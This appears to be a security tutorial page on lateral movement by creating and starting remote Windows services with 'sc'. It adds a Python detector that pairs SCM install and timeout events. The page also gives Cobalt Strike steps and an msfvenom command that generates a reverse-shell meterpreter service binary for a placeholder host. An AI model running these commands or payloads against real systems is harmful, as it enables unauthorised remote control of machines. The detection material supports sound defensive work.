Service Control (SC)

Administrator rights on the target machine are mandatory.

The Service Controller (sc) is particularly valuable to attackers because it can create and start a service on a remote host over SMB.

sc \\host.domain create ExampleService binpath= "c:\windows\system32\calc.exe"
sc \\host.domain start ExampleService

The caveat is that the executable must be a service binary. Service binaries differ from ordinary executables in that they need to "register" with the Service Control Manager (SCM); if they do not, execution is terminated. Hence, if a non-service binary is used for this purpose, the agent/beacon checks in for a brief moment and then terminates.
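The registration failure described above is visible to defenders in the System event log: the Service Control Manager records event 7045 when a service is installed and event 7009 when a started service does not connect to the SCM in time. The following is an added detection example, not part of the original page; the events are constructed, and the EventData field names (ServiceName, ImagePath, param2) are assumed to match the host's exported event XML.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

def _ev(eid, ts, data):
    """Build one constructed event in the Windows event XML layout."""
    body = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{eid}</EventID>'
            f'<TimeCreated SystemTime="{ts}"/></System>'
            f'<EventData>{body}</EventData></Event>')

# Constructed sample events, not real telemetry.
SAMPLE = [
    _ev(7045, "2024-01-10T09:00:00Z", {"ServiceName": "ExampleService",
        "ImagePath": r"c:\windows\system32\calc.exe", "AccountName": "LocalSystem"}),
    _ev(7009, "2024-01-10T09:00:31Z", {"param1": "30000", "param2": "ExampleService"}),
    _ev(7045, "2024-01-10T10:00:00Z", {"ServiceName": "BackupAgent",
        "ImagePath": r"C:\Program Files\Backup\agent.exe", "AccountName": "LocalSystem"}),
]

def parse(xml_text):
    """Return (event id, timestamp, EventData dict) for one event."""
    root = ET.fromstring(xml_text)
    eid = int(root.find("e:System/e:EventID", NS).text)
    ts = root.find("e:System/e:TimeCreated", NS).get("SystemTime")
    data = {d.get("Name"): d.text for d in root.findall("e:EventData/e:Data", NS)}
    # Keep only whole seconds so fractional SystemTime values also parse.
    return eid, datetime.strptime(ts[:19], "%Y-%m-%dT%H:%M:%S"), data

def installs_that_never_registered(events, window=timedelta(minutes=2)):
    """7045 installs followed within `window` by a 7009 timeout for the same service."""
    parsed = sorted((parse(x) for x in events), key=lambda p: p[1])
    installs = [(ts, d) for eid, ts, d in parsed if eid == 7045]
    timeouts = [(ts, d.get("param2") or "") for eid, ts, d in parsed if eid == 7009]
    hits = []
    for ts, d in installs:
        name = d["ServiceName"]
        if any(n.lower() == name.lower() and ts <= t <= ts + window
               for t, n in timeouts):
            hits.append({"service": name, "image": d["ImagePath"],
                         "installed": ts.isoformat()})
    return hits

if __name__ == "__main__":
    for hit in installs_that_never_registered(SAMPLE):
        print(hit)
```

A newly installed service whose image is an ordinary executable and which times out on its first start is worth triage, especially when the install came from a remote administrator session.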

Directly creating an executable that runs as a service is possible:

Cobalt Strike:

In Cobalt Strike, navigate to Attacks > Packages > Windows Executable (S), and select the Service Binary output type.

Metasploit:

Using msfvenom, specify the exe-service format:

msfvenom -p windows/meterpreter/reverse_tcp -f exe-service LHOST=<IP> LPORT=<PORT> -o service.exe
